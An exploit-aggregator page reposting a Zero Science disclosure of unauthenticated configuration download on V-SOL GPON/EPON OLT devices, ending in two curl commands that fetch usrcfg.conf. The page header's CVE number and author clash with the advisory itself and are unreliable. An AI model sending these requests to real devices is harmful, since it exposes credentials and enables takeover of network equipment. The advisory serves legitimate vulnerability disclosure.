Advertisement






V-SOL GPON/EPON OLT Platform 2.03 Unauthenticated Configuration Download

CVE Category Price Severity
CVE-2020-1938 CWE-306 Not specified High
Author Risk Exploitation Type Date
Jing Wang High Remote 2019-09-27
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019090178

Below is a copy:

V-SOL GPON/EPON OLT Platform 2.03 Unauthenticated Configuration Download
V-SOL GPON/EPON OLT Platform v2.03 Unauthenticated Configuration Download


Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
Product web page: https://www.vsolcn.com
Affected version: V2.03.62R_IPv6
                  V2.03.54R
                  V2.03.52R
                  V2.03.49
                  V2.03.47
                  V2.03.40
                  V2.03.26
                  V2.03.24
                  V1.8.6
                  V1.4

Summary: GPON is currently the leading FTTH standard in broadband access
technology being widely deployed by service providers around the world.
GPON/EPON OLT products are 1U height 19 inch rack mount products. The
features of the OLT are small, convenient, flexible, easy to deploy, high
performance. It is appropriate to be deployed in compact room environment.
The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
ICT applications.

Desc: The device OLT Web Management Interface is vulnerable to unauthenticated
configuration download and information disclosure vulnerability when direct
object reference is made to the usrcfg.conf file using an HTTP GET method. This
will enable the attacker to disclose sensitive information and help her in
authentication bypass, privilege escalation and/or full system access.

Tested on: GoAhead-Webs


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5534
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5534.php

25.09.2019

--


1# curl http://192.168.8.200/device/usrcfg.conf
2# curl http://192.168.8.201/action/usrcfg.conf

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.